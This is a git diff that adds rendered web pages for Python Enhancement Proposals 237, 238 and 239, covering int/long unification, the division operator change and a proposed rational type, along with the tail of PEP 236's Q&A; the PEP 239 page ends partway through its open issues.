NOTE: PEP 264 later addressed this, by adding intelligence to the standard +codeop.py. Simulated shells that don’t use the standard library shell +helpers can get a similar effect by exploiting the new optional arguments to +compile() added by PEP 264.

+
+
+

Questions and Answers

+
+

What about a “from __past__” version, to get back old behavior?

+

Outside the scope of this PEP. Seems unlikely to the author, though. Write a +PEP if you want to pursue it.

+
+
+

What about incompatibilities due to changes in the Python virtual machine?

+

Outside the scope of this PEP, although PEP 5 suggests a grace period +there too, and the future_statement may also have a role to play there.

+
+
+

What about incompatibilities due to changes in Python’s C API?

+

Outside the scope of this PEP.

+
+
+

I want to wrap future_statements in try/except blocks, so I can use different code depending on which version of Python I’m running. Why can’t I?

+

Sorry! try/except is a runtime feature; future_statements are primarily +compile-time gimmicks, and your try/except happens long after the compiler +is done. That is, by the time you do try/except, the semantics in effect +for the module are already a done deal. Since the try/except wouldn’t +accomplish what it looks like it should accomplish, it’s simply not allowed. +We also want to keep these special statements very easy to find and to +recognize.

+

Note that you can import __future__ directly, and use the information in +it, along with sys.version_info, to figure out where the release you’re +running under stands in relation to a given feature’s status.

+
+
+

Going back to the nested_scopes example, what if release 2.2 comes along and I still haven’t changed my code? How can I keep the 2.1 behavior then?

+

By continuing to use 2.1, and not moving to 2.2 until you do change your +code. The purpose of future_statement is to make life easier for people who +keep current with the latest release in a timely fashion. We don’t hate you +if you don’t, but your problems are much harder to solve, and somebody with +those problems will need to write a PEP addressing them. future_statement is +aimed at a different audience.

+
+
+

Overloading import sucks. Why not introduce a new statement for this?

+

Like maybe lambda lambda nested_scopes? That is, unless we introduce a +new keyword, we can’t introduce an entirely new statement. But if we +introduce a new keyword, that in itself would break old code. That would be +too ironic to bear. Yes, overloading import does suck, but not as +energetically as the alternatives – as is, future_statements are 100% +backward compatible.

+
+
+ +
+

References and Footnotes

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0236.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0237/index.html b/pep-0237/index.html new file mode 100644 index 00000000000..0361913ad55 --- /dev/null +++ b/pep-0237/index.html @@ -0,0 +1,421 @@ + + + + + + + + PEP 237 – Unifying Long Integers and Integers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 237 – Unifying Long Integers and Integers

+
+
Author:
+
Moshe Zadka, Guido van Rossum
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
16-Mar-2001, 14-Aug-2001, 23-Aug-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

Python currently distinguishes between two kinds of integers (ints): regular +or short ints, limited by the size of a C long (typically 32 or 64 bits), and +long ints, which are limited only by available memory. When operations on +short ints yield results that don’t fit in a C long, they raise an error. +There are some other distinctions too. This PEP proposes to do away with most +of the differences in semantics, unifying the two types from the perspective +of the Python user.

+
+
+

Rationale

+

Many programs find a need to deal with larger numbers after the fact, and +changing the algorithms later is bothersome. It can hinder performance in the +normal case, when all arithmetic is performed using long ints whether or not +they are needed.

+

Having the machine word size exposed to the language hinders portability. For +examples Python source files and .pyc’s are not portable between 32-bit and +64-bit machines because of this.

+

There is also the general desire to hide unnecessary details from the Python +user when they are irrelevant for most applications. An example is memory +allocation, which is explicit in C but automatic in Python, giving us the +convenience of unlimited sizes on strings, lists, etc. It makes sense to +extend this convenience to numbers.

+

It will give new Python programmers (whether they are new to programming in +general or not) one less thing to learn before they can start using the +language.

+
+
+

Implementation

+

Initially, two alternative implementations were proposed (one by each author):

+
    +
  1. The PyInt type’s slot for a C long will be turned into a:
    union {
    +    long i;
    +    struct {
    +        unsigned long length;
    +        digit digits[1];
    +    } bignum;
    +};
    +
    +
    +

    Only the n-1 lower bits of the long have any meaning; the top bit +is always set. This distinguishes the union. All PyInt functions +will check this bit before deciding which types of operations to use.

    +
  2. +
  3. The existing short and long int types remain, but operations return +a long int instead of raising OverflowError when a result cannot be +represented as a short int. A new type, integer, may be introduced +that is an abstract base type of which both the int and long +implementation types are subclassed. This is useful so that programs can +check integer-ness with a single test:
    if isinstance(i, integer): ...
    +
    +
    +
  4. +
+

After some consideration, the second implementation plan was selected, since +it is far easier to implement, is backwards compatible at the C API level, and +in addition can be implemented partially as a transitional measure.

+
+
+

Incompatibilities

+

The following operations have (usually subtly) different semantics for short +and for long integers, and one or the other will have to be changed somehow. +This is intended to be an exhaustive list. If you know of any other operation +that differ in outcome depending on whether a short or a long int with the same +value is passed, please write the second author.

+
    +
  • Currently, all arithmetic operators on short ints except << raise +OverflowError if the result cannot be represented as a short int. This +will be changed to return a long int instead. The following operators can +currently raise OverflowError: x+y, x-y, x*y, x**y, +divmod(x, y), x/y, x%y, and -x. (The last four can only +overflow when the value -sys.maxint-1 is involved.)
  • +
  • Currently, x<<n can lose bits for short ints. This will be changed to +return a long int containing all the shifted-out bits, if returning a short +int would lose bits (where changing sign is considered a special case of +losing bits).
  • +
  • Currently, hex and oct literals for short ints may specify negative values; +for example 0xffffffff == -1 on a 32-bit machine. This will be changed +to equal 0xffffffffL (2**32-1).
  • +
  • Currently, the %u, %x, %X and %o string formatting operators +and the hex() and oct() built-in functions behave differently for +negative numbers: negative short ints are formatted as unsigned C long, +while negative long ints are formatted with a minus sign. This will be +changed to use the long int semantics in all cases (but without the trailing +L that currently distinguishes the output of hex() and oct() for +long ints). Note that this means that %u becomes an alias for %d. +It will eventually be removed.
  • +
  • Currently, repr() of a long int returns a string ending in L while +repr() of a short int doesn’t. The L will be dropped; but not before +Python 3.0.
  • +
  • Currently, an operation with long operands will never return a short int. +This may change, since it allows some optimization. (No changes have been +made in this area yet, and none are planned.)
  • +
  • The expression type(x).__name__ depends on whether x is a short or a +long int. Since implementation alternative 2 is chosen, this difference +will remain. (In Python 3.0, we may be able to deploy a trick to hide the +difference, because it is annoying to reveal the difference to user code, +and more so as the difference between the two types is less visible.)
  • +
  • Long and short ints are handled different by the marshal module, and by +the pickle and cPickle modules. This difference will remain (at +least until Python 3.0).
  • +
  • Short ints with small values (typically between -1 and 99 inclusive) are +interned – whenever a result has such a value, an existing short int with +the same value is returned. This is not done for long ints with the same +values. This difference will remain. (Since there is no guarantee of this +interning, it is debatable whether this is a semantic difference – but code +may exist that uses is for comparisons of short ints and happens to work +because of this interning. Such code may fail if used with long ints.)
  • +
+
+
+

Literals

+

A trailing L at the end of an integer literal will stop having any +meaning, and will be eventually become illegal. The compiler will choose the +appropriate type solely based on the value. (Until Python 3.0, it will force +the literal to be a long; but literals without a trailing L may also be +long, if they are not representable as short ints.)

+
+
+

Built-in Functions

+

The function int() will return a short or a long int depending on the +argument value. In Python 3.0, the function long() will call the function +int(); before then, it will continue to force the result to be a long int, +but otherwise work the same way as int(). The built-in name long will +remain in the language to represent the long implementation type (unless it is +completely eradicated in Python 3.0), but using the int() function is +still recommended, since it will automatically return a long when needed.

+
+
+

C API

+

The C API remains unchanged; C code will still need to be aware of the +difference between short and long ints. (The Python 3.0 C API will probably +be completely incompatible.)

+

The PyArg_Parse*() APIs already accept long ints, as long as they are +within the range representable by C ints or longs, so that functions taking C +int or long argument won’t have to worry about dealing with Python longs.

+
+
+

Transition

+

There are three major phases to the transition:

+
    +
  1. Short int operations that currently raise OverflowError return a long +int value instead. This is the only change in this phase. Literals will +still distinguish between short and long ints. The other semantic +differences listed above (including the behavior of <<) will remain. +Because this phase only changes situations that currently raise +OverflowError, it is assumed that this won’t break existing code. +(Code that depends on this exception would have to be too convoluted to be +concerned about it.) For those concerned about extreme backwards +compatibility, a command line option (or a call to the warnings module) +will allow a warning or an error to be issued at this point, but this is +off by default.
  2. +
  3. The remaining semantic differences are addressed. In all cases the long +int semantics will prevail. Since this will introduce backwards +incompatibilities which will break some old code, this phase may require a +future statement and/or warnings, and a prolonged transition phase. The +trailing L will continue to be used for longs as input and by +repr().
      +
    1. Warnings are enabled about operations that will change their numeric +outcome in stage 2B, in particular hex() and oct(), %u, +%x, %X and %o, hex and oct literals in the +(inclusive) range [sys.maxint+1, sys.maxint*2+1], and left shifts +losing bits.
    2. +
    3. The new semantic for these operations are implemented. Operations that +give different results than before will not issue a warning.
    4. +
    +
  4. +
  5. The trailing L is dropped from repr(), and made illegal on input. +(If possible, the long type completely disappears.) The trailing L +is also dropped from hex() and oct().
  6. +
+

Phase 1 will be implemented in Python 2.2.

+

Phase 2 will be implemented gradually, with 2A in Python 2.3 and 2B in +Python 2.4.

+

Phase 3 will be implemented in Python 3.0 (at least two years after Python 2.4 +is released).

+
+
+

OverflowWarning

+

Here are the rules that guide warnings generated in situations that currently +raise OverflowError. This applies to transition phase 1. Historical +note: despite that phase 1 was completed in Python 2.2, and phase 2A in Python +2.3, nobody noticed that OverflowWarning was still generated in Python 2.3. +It was finally disabled in Python 2.4. The Python builtin +OverflowWarning, and the corresponding C API PyExc_OverflowWarning, +are no longer generated or used in Python 2.4, but will remain for the +(unlikely) case of user code until Python 2.5.

+
    +
  • A new warning category is introduced, OverflowWarning. This is a +built-in name.
  • +
  • If an int result overflows, an OverflowWarning warning is issued, with a +message argument indicating the operation, e.g. “integer addition”. This +may or may not cause a warning message to be displayed on sys.stderr, or +may cause an exception to be raised, all under control of the -W command +line and the warnings module.
  • +
  • The OverflowWarning warning is ignored by default.
  • +
  • The OverflowWarning warning can be controlled like all warnings, via the +-W command line option or via the warnings.filterwarnings() call. +For example:
    python -Wdefault::OverflowWarning
    +
    +
    +

    cause the OverflowWarning to be displayed the first time it occurs at a +particular source line, and:

    +
    python -Werror::OverflowWarning
    +
    +
    +

    cause the OverflowWarning to be turned into an exception whenever it +happens. The following code enables the warning from inside the program:

    +
    import warnings
    +warnings.filterwarnings("default", "", OverflowWarning)
    +
    +
    +

    See the python man page for the -W option and the warnings +module documentation for filterwarnings().

    +
  • +
  • If the OverflowWarning warning is turned into an error, +OverflowError is substituted. This is needed for backwards +compatibility.
  • +
  • Unless the warning is turned into an exceptions, the result of the operation +(e.g., x+y) is recomputed after converting the arguments to long ints.
  • +
+
+
+

Example

+

If you pass a long int to a C function or built-in operation that takes an +integer, it will be treated the same as a short int as long as the value fits +(by virtue of how PyArg_ParseTuple() is implemented). If the long value +doesn’t fit, it will still raise an OverflowError. For example:

+
def fact(n):
+    if n <= 1:
+    return 1
+return n*fact(n-1)
+
+A = "ABCDEFGHIJKLMNOPQ"
+n = input("Gimme an int: ")
+print A[fact(n)%17]
+
+
+

For n >= 13, this currently raises OverflowError (unless the user +enters a trailing L as part of their input), even though the calculated +index would always be in range(17). With the new approach this code will +do the right thing: the index will be calculated as a long int, but its value +will be in range.

+
+
+

Resolved Issues

+

These issues, previously open, have been resolved.

+
    +
  • hex() and oct() applied to longs will continue to produce a trailing +L until Python 3000. The original text above wasn’t clear about this, +but since it didn’t happen in Python 2.4 it was thought better to leave it +alone. BDFL pronouncement here:

    https://mail.python.org/pipermail/python-dev/2006-June/065918.html

    +
  • +
  • What to do about sys.maxint? Leave it in, since it is still relevant +whenever the distinction between short and long ints is still relevant (e.g. +when inspecting the type of a value).
  • +
  • Should we remove %u completely? Remove it.
  • +
  • Should we warn about << not truncating integers? Yes.
  • +
  • Should the overflow warning be on a portable maximum size? No.
  • +
+
+
+

Implementation

+

The implementation work for the Python 2.x line is completed; phase 1 was +released with Python 2.2, phase 2A with Python 2.3, and phase 2B will be +released with Python 2.4 (and is already in CVS).

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0237.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0238/index.html b/pep-0238/index.html new file mode 100644 index 00000000000..2ae1adcca89 --- /dev/null +++ b/pep-0238/index.html @@ -0,0 +1,581 @@ + + + + + + + + PEP 238 – Changing the Division Operator | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 238 – Changing the Division Operator

+
+
Author:
+
Moshe Zadka <moshez at zadka.site.co.il>, +Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
16-Mar-2001, 26-Jul-2001, 27-Jul-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

The current division (/) operator has an ambiguous meaning for numerical +arguments: it returns the floor of the mathematical result of division if the +arguments are ints or longs, but it returns a reasonable approximation of the +division result if the arguments are floats or complex. This makes +expressions expecting float or complex results error-prone when integers are +not expected but possible as inputs.

+

We propose to fix this by introducing different operators for different +operations: x/y to return a reasonable approximation of the mathematical +result of the division (“true division”), x//y to return the floor +(“floor division”). We call the current, mixed meaning of x/y +“classic division”.

+

Because of severe backwards compatibility issues, not to mention a major +flamewar on c.l.py, we propose the following transitional measures (starting +with Python 2.2):

+
    +
  • Classic division will remain the default in the Python 2.x series; true +division will be standard in Python 3.0.
  • +
  • The // operator will be available to request floor division +unambiguously.
  • +
  • The future division statement, spelled from __future__ import division, +will change the / operator to mean true division throughout the module.
  • +
  • A command line option will enable run-time warnings for classic division +applied to int or long arguments; another command line option will make true +division the default.
  • +
  • The standard library will use the future division statement and the // +operator when appropriate, so as to completely avoid classic division.
  • +
+
+
+

Motivation

+

The classic division operator makes it hard to write numerical expressions +that are supposed to give correct results from arbitrary numerical inputs. +For all other operators, one can write down a formula such as x*y**2 + z, +and the calculated result will be close to the mathematical result (within the +limits of numerical accuracy, of course) for any numerical input type (int, +long, float, or complex). But division poses a problem: if the expressions +for both arguments happen to have an integral type, it implements floor +division rather than true division.

+

The problem is unique to dynamically typed languages: in a statically typed +language like C, the inputs, typically function arguments, would be declared +as double or float, and when a call passes an integer argument, it is +converted to double or float at the time of the call. Python doesn’t have +argument type declarations, so integer arguments can easily find their way +into an expression.

+

The problem is particularly pernicious since ints are perfect substitutes for +floats in all other circumstances: math.sqrt(2) returns the same value as +math.sqrt(2.0), 3.14*100 and 3.14*100.0 return the same value, and +so on. Thus, the author of a numerical routine may only use floating point +numbers to test his code, and believe that it works correctly, and a user may +accidentally pass in an integer input value and get incorrect results.

+

Another way to look at this is that classic division makes it difficult to +write polymorphic functions that work well with either float or int arguments; +all other operators already do the right thing. No algorithm that works for +both ints and floats has a need for truncating division in one case and true +division in the other.

+

The correct work-around is subtle: casting an argument to float() is wrong if +it could be a complex number; adding 0.0 to an argument doesn’t preserve the +sign of the argument if it was minus zero. The only solution without either +downside is multiplying an argument (typically the first) by 1.0. This leaves +the value and sign unchanged for float and complex, and turns int and long +into a float with the corresponding value.

+

It is the opinion of the authors that this is a real design bug in Python, and +that it should be fixed sooner rather than later. Assuming Python usage will +continue to grow, the cost of leaving this bug in the language will eventually +outweigh the cost of fixing old code – there is an upper bound to the amount +of code to be fixed, but the amount of code that might be affected by the bug +in the future is unbounded.

+

Another reason for this change is the desire to ultimately unify Python’s +numeric model. This is the subject of PEP 228 (which is currently +incomplete). A unified numeric model removes most of the user’s need to be +aware of different numerical types. This is good for beginners, but also +takes away concerns about different numeric behavior for advanced programmers. +(Of course, it won’t remove concerns about numerical stability and accuracy.)

+

In a unified numeric model, the different types (int, long, float, complex, +and possibly others, such as a new rational type) serve mostly as storage +optimizations, and to some extent to indicate orthogonal properties such as +inexactness or complexity. In a unified model, the integer 1 should be +indistinguishable from the floating point number 1.0 (except for its +inexactness), and both should behave the same in all numeric contexts. +Clearly, in a unified numeric model, if a==b and c==d, a/c should +equal b/d (taking some liberties due to rounding for inexact numbers), and +since everybody agrees that 1.0/2.0 equals 0.5, 1/2 should also equal +0.5. Likewise, since 1//2 equals zero, 1.0//2.0 should also equal +zero.

+
+
+

Variations

+

Aesthetically, x//y doesn’t please everyone, and hence several variations +have been proposed. They are addressed here:

+
    +
  • x div y. This would introduce a new keyword. Since div is a +popular identifier, this would break a fair amount of existing code, unless +the new keyword was only recognized under a future division statement. +Since it is expected that the majority of code that needs to be converted is +dividing integers, this would greatly increase the need for the future +division statement. Even with a future statement, the general sentiment +against adding new keywords unless absolutely necessary argues against this.
  • +
  • div(x, y). This makes the conversion of old code much harder. +Replacing x/y with x//y or x div y can be done with a simple +query replace; in most cases the programmer can easily verify that a +particular module only works with integers so all occurrences of x/y can +be replaced. (The query replace is still needed to weed out slashes +occurring in comments or string literals.) Replacing x/y with +div(x, y) would require a much more intelligent tool, since the extent +of the expressions to the left and right of the / must be analyzed +before the placement of the div( and ) part can be decided.
  • +
  • x \ y. The backslash is already a token, meaning line continuation, and +in general it suggests an escape to Unix eyes. In addition (this due to +Terry Reedy) this would make things like eval("x\y") harder to get +right.
  • +
+
+
+

Alternatives

+

In order to reduce the amount of old code that needs to be converted, several +alternative proposals have been put forth. Here is a brief discussion of each +proposal (or category of proposals). If you know of an alternative that was +discussed on c.l.py that isn’t mentioned here, please mail the second author.

+
    +
  • Let / keep its classic semantics; introduce // for true division. +This still leaves a broken operator in the language, and invites to use the +broken behavior. It also shuts off the road to a unified numeric model a la +PEP 228.
  • +
  • Let int division return a special “portmanteau” type that behaves as an +integer in integer context, but like a float in a float context. The +problem with this is that after a few operations, the int and the float +value could be miles apart, it’s unclear which value should be used in +comparisons, and of course many contexts (like conversion to string) don’t +have a clear integer or float preference.
  • +
  • Use a directive to use specific division semantics in a module, rather than +a future statement. This retains classic division as a permanent wart in +the language, requiring future generations of Python programmers to be +aware of the problem and the remedies.
  • +
  • Use from __past__ import division to use classic division semantics in a +module. This also retains the classic division as a permanent wart, or at +least for a long time (eventually the past division statement could raise an +ImportError).
  • +
  • Use a directive (or some other way) to specify the Python version for which +a specific piece of code was developed. This requires future Python +interpreters to be able to emulate exactly several previous versions of +Python, and moreover to do so for multiple versions within the same +interpreter. This is way too much work. A much simpler solution is to keep +multiple interpreters installed. Another argument against this is that the +version directive is almost always overspecified: most code written for +Python X.Y, works for Python X.(Y-1) and X.(Y+1) as well, so specifying X.Y +as a version is more constraining than it needs to be. At the same time, +there’s no way to know at which future or past version the code will break.
  • +
+
+
+

API Changes

+

During the transitional phase, we have to support three division operators +within the same program: classic division (for / in modules without a +future division statement), true division (for / in modules with a future +division statement), and floor division (for //). Each operator comes in +two flavors: regular, and as an augmented assignment operator (/= or +//=).

+

The names associated with these variations are:

+
    +
  • Overloaded operator methods:
    __div__(), __floordiv__(), __truediv__();
    +__idiv__(), __ifloordiv__(), __itruediv__().
    +
    +
    +
  • +
  • Abstract API C functions:
    PyNumber_Divide(), PyNumber_FloorDivide(),
    +PyNumber_TrueDivide();
    +
    +PyNumber_InPlaceDivide(), PyNumber_InPlaceFloorDivide(),
    +PyNumber_InPlaceTrueDivide().
    +
    +
    +
  • +
  • Byte code opcodes:
    BINARY_DIVIDE, BINARY_FLOOR_DIVIDE, BINARY_TRUE_DIVIDE;
    +INPLACE_DIVIDE, INPLACE_FLOOR_DIVIDE, INPLACE_TRUE_DIVIDE.
    +
    +
    +
  • +
  • PyNumberMethod slots:
    nb_divide, nb_floor_divide, nb_true_divide,
    +nb_inplace_divide, nb_inplace_floor_divide,
    +nb_inplace_true_divide.
    +
    +
    +
  • +
+

The added PyNumberMethod slots require an additional flag in tp_flags; +this flag will be named Py_TPFLAGS_HAVE_NEWDIVIDE and will be included in +Py_TPFLAGS_DEFAULT.

+

The true and floor division APIs will look for the corresponding slots and +call that; when that slot is NULL, they will raise an exception. There is +no fallback to the classic divide slot.

+

In Python 3.0, the classic division semantics will be removed; the classic +division APIs will become synonymous with true division.

+
+
+

Command Line Option

+

The -Q command line option takes a string argument that can take four +values: old, warn, warnall, or new. The default is old +in Python 2.2 but will change to warn in later 2.x versions. The old +value means the classic division operator acts as described. The warn +value means the classic division operator issues a warning (a +DeprecationWarning using the standard warning framework) when applied +to ints or longs. The warnall value also issues warnings for classic +division when applied to floats or complex; this is for use by the +fixdiv.py conversion script mentioned below. The new value changes +the default globally so that the / operator is always interpreted as +true division. The new option is only intended for use in certain +educational environments, where true division is required, but asking the +students to include the future division statement in all their code would be a +problem.

+

This option will not be supported in Python 3.0; Python 3.0 will always +interpret / as true division.

+

(This option was originally proposed as -D, but that turned out to be an +existing option for Jython, hence the Q – mnemonic for Quotient. Other names +have been proposed, like -Qclassic, -Qclassic-warn, -Qtrue, or +-Qold_division etc.; these seem more verbose to me without much advantage. +After all the term classic division is not used in the language at all (only +in the PEP), and the term true division is rarely used in the language – only +in __truediv__.)

+
+
+

Semantics of Floor Division

+

Floor division will be implemented in all the Python numeric types, and will +have the semantics of:

+
a // b == floor(a/b)
+
+
+

except that the result type will be the common type into which a and b are +coerced before the operation.

+

Specifically, if a and b are of the same type, a//b will be of that +type too. If the inputs are of different types, they are first coerced to a +common type using the same rules used for all other arithmetic operators.

+

In particular, if a and b are both ints or longs, the result has the same +type and value as for classic division on these types (including the case of +mixed input types; int//long and long//int will both return a long).

+

For floating point inputs, the result is a float. For example:

+
3.5//2.0 == 1.0
+
+
+

For complex numbers, // raises an exception, since floor() of a +complex number is not allowed.

+

For user-defined classes and extension types, all semantics are up to the +implementation of the class or type.

+
+
+

Semantics of True Division

+

True division for ints and longs will convert the arguments to float and then +apply a float division. That is, even 2/1 will return a float (2.0), +not an int. For floats and complex, it will be the same as classic division.

+

The 2.2 implementation of true division acts as if the float type had +unbounded range, so that overflow doesn’t occur unless the magnitude of the +mathematical result is too large to represent as a float. For example, +after x = 1L << 40000, float(x) raises OverflowError (note that +this is also new in 2.2: previously the outcome was platform-dependent, most +commonly a float infinity). But x/x returns 1.0 without exception, +while x/1 raises OverflowError.

+

Note that for int and long arguments, true division may lose information; this +is in the nature of true division (as long as rationals are not in the +language). Algorithms that consciously use longs should consider using +//, as true division of longs retains no more than 53 bits of precision +(on most platforms).

+

If and when a rational type is added to Python (see PEP 239), true +division for ints and longs should probably return a rational. This avoids +the problem with true division of ints and longs losing information. But +until then, for consistency, float is the only choice for true division.

+
+
+

The Future Division Statement

+

If from __future__ import division is present in a module, or if +-Qnew is used, the / and /= operators are translated to true +division opcodes; otherwise they are translated to classic division (until +Python 3.0 comes along, where they are always translated to true division).

+

The future division statement has no effect on the recognition or translation +of // and //=.

+

See PEP 236 for the general rules for future statements.

+

(It has been proposed to use a longer phrase, like true_division or +modern_division. These don’t seem to add much information.)

+
+
+

Open Issues

+

We expect that these issues will be resolved over time, as more feedback is +received or we gather more experience with the initial implementation.

+
    +
  • It has been proposed to call // the quotient operator, and the / +operator the ratio operator. I’m not sure about this – for some people +quotient is just a synonym for division, and ratio suggests rational +numbers, which is wrong. I prefer the terminology to be slightly awkward +if that avoids unambiguity. Also, for some folks quotient suggests +truncation towards zero, not towards infinity as floor division +says explicitly.
  • +
  • It has been argued that a command line option to change the default is +evil. It can certainly be dangerous in the wrong hands: for example, it +would be impossible to combine a 3rd party library package that requires +-Qnew with another one that requires -Qold. But I believe that the +VPython folks need a way to enable true division by default, and other +educators might need the same. These usually have enough control over the +library packages available in their environment.
  • +
  • For classes to have to support all three of __div__(), +__floordiv__() and __truediv__() seems painful; and what to do in +3.0? Maybe we only need __div__() and __floordiv__(), or maybe at +least true division should try __truediv__() first and __div__() +second.
  • +
+
+
+

Resolved Issues

+
    +
  • Issue: For very large long integers, the definition of true division as +returning a float causes problems, since the range of Python longs is much +larger than that of Python floats. This problem will disappear if and when +rational numbers are supported.

    Resolution: For long true division, Python uses an internal float type with +native double precision but unbounded range, so that OverflowError doesn’t +occur unless the quotient is too large to represent as a native double.

    +
  • +
  • Issue: In the interim, maybe the long-to-float conversion could be made to +raise OverflowError if the long is out of range.

    Resolution: This has been implemented, but, as above, the magnitude of the +inputs to long true division doesn’t matter; only the magnitude of the +quotient matters.

    +
  • +
  • Issue: Tim Peters will make sure that whenever an in-range float is +returned, decent precision is guaranteed.

    Resolution: Provided the quotient of long true division is representable as +a float, it suffers no more than 3 rounding errors: one each for converting +the inputs to an internal float type with native double precision but +unbounded range, and one more for the division. However, note that if the +magnitude of the quotient is too small to represent as a native double, +0.0 is returned without exception (“silent underflow”).

    +
  • +
+
+
+

FAQ

+
+

When will Python 3.0 be released?

+
+
We don’t plan that long ahead, so we can’t say for sure. We want to allow +at least two years for the transition. If Python 3.0 comes out sooner, +we’ll keep the 2.x line alive for backwards compatibility until at least +two years from the release of Python 2.2. In practice, you will be able +to continue to use the Python 2.x line for several years after Python 3.0 +is released, so you can take your time with the transition. Sites are +expected to have both Python 2.x and Python 3.x installed simultaneously.
+
+
+

Why isn’t true division called float division?

+
+
Because I want to keep the door open to possibly introducing rationals +and making 1/2 return a rational rather than a float. See PEP 239.
+
+
+

Why is there a need for __truediv__ and __itruediv__?

+
+
We don’t want to make user-defined classes second-class citizens. +Certainly not with the type/class unification going on.
+
+
+

How do I write code that works under the classic rules as well as under the new rules without using // or a future division statement?

+
+
Use x*1.0/y for true division, divmod(x, y) (PEP 228) for int +division. Especially the latter is best hidden inside a function. You +may also write float(x)/y for true division if you are sure that you +don’t expect complex numbers. If you know your integers are never +negative, you can use int(x/y) – while the documentation of int() +says that int() can round or truncate depending on the C +implementation, we know of no C implementation that doesn’t truncate, and +we’re going to change the spec for int() to promise truncation. Note +that classic division (and floor division) round towards negative +infinity, while int() rounds towards zero, giving different answers +for negative numbers.
+
+
+

How do I specify the division semantics for input(), compile(), execfile(), eval() and exec?

+
+
They inherit the choice from the invoking module. PEP 236 now lists +this as a resolved problem, referring to PEP 264.
+
+
+

What about code compiled by the codeop module?

+
+
This is dealt with properly; see PEP 264.
+
+
+

Will there be conversion tools or aids?

+
+
Certainly. While these are outside the scope of the PEP, I should point +out two simple tools that will be released with Python 2.2a3: +Tools/scripts/finddiv.py finds division operators (slightly smarter +than grep /) and Tools/scripts/fixdiv.py can produce patches based +on run-time analysis.
+
+
+

Why is my question not answered here?

+
+
Because we weren’t aware of it. If it’s been discussed on c.l.py and you +believe the answer is of general interest, please notify the second +author. (We don’t have the time or inclination to answer every question +sent in private email, hence the requirement that it be discussed on +c.l.py first.)
+
+
+
+

Implementation

+

Essentially everything mentioned here is implemented in CVS and will be +released with Python 2.2a3; most of it was already released with Python 2.2a2.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0238.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0239/index.html b/pep-0239/index.html new file mode 100644 index 00000000000..805a4aab11d --- /dev/null +++ b/pep-0239/index.html @@ -0,0 +1,249 @@ + + + + + + + + PEP 239 – Adding a Rational Type to Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 239 – Adding a Rational Type to Python

+
+
Author:
+
Christopher A. Craig <python-pep at ccraig.org>, Moshe Zadka <moshez at zadka.site.co.il>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
16-Mar-2001
+
+
+
+
Table of Contents +
+
+

Warning

+

This PEP has been rejected.

+

×

+

The needs outlined in the rationale section +have been addressed to some extent by the acceptance of PEP 327 +for decimal arithmetic. Guido also noted, “Rational arithmetic +was the default ‘exact’ arithmetic in ABC and it did not work out as +expected”. See the python-dev discussion on 17 June 2005 [1].

+

Postscript: With the acceptance of PEP 3141, “A Type Hierarchy +for Numbers”, a ‘Rational’ numeric abstract base class was added +with a concrete implementation in the ‘fractions’ module.

+

+
+
+

Abstract

+

Python has no numeric type with the semantics of an unboundedly +precise rational number. This proposal explains the semantics of +such a type, and suggests builtin functions and literals to +support such a type. This PEP suggests no literals for rational +numbers; that is left for another PEP.

+
+
+

Rationale

+

While sometimes slower and more memory intensive (in general, +unboundedly so) rational arithmetic captures more closely the +mathematical ideal of numbers, and tends to have behavior which is +less surprising to newbies. Though many Python implementations of +rational numbers have been written, none of these exist in the +core, or are documented in any way. This has made them much less +accessible to people who are less Python-savvy.

+
+
+

RationalType

+

There will be a new numeric type added called RationalType. Its +unary operators will do the obvious thing. Binary operators will +coerce integers and long integers to rationals, and rationals to +floats and complexes.

+

The following attributes will be supported: .numerator and +.denominator. The language definition will promise that:

+
r.denominator * r == r.numerator
+
+
+

that the GCD of the numerator and the denominator is 1 and that +the denominator is positive.

+

The method r.trim(max_denominator) will return the closest +rational s to r such that abs(s.denominator) <= max_denominator.

+
+
+

The rational() Builtin

+

This function will have the signature rational(n, d=1). n and d +must both be integers, long integers or rationals. A guarantee is +made that:

+
rational(n, d) * d == n
+
+
+
+
+

Open Issues

+
    +
  • Maybe the type should be called rat instead of rational. +Somebody proposed that we have “abstract” pure mathematical +types named complex, real, rational, integer, and “concrete” +representation types with names like float, rat, long, int.
  • +
  • Should a rational number with an integer value be allowed as a +sequence index? For example, should s[5/3 - 2/3] be equivalent +to s[1]?
  • +
  • Should shift and mask operators be allowed for rational numbers? +For rational numbers with integer values?
  • +
  • Marcin ‘Qrczak’ Kowalczyk summarized the arguments for and +against unifying ints with rationals nicely on c.l.py

    Arguments for unifying ints with rationals:

    +
      +
    • Since 2 == 2/1 and maybe str(2/1) == '2', it reduces surprises +where objects seem equal but behave differently.
    • +
    • / can be freely used for integer division when I know that +there is no remainder (if I am wrong and there is a remainder, +there will probably be some exception later).
    • +
    +

    Arguments against:

    +
      +
    • When I use the result of / as a sequence index, it’s usually +an error which should not be hidden by making the program +working for some data, since it will break for other data.
    • +
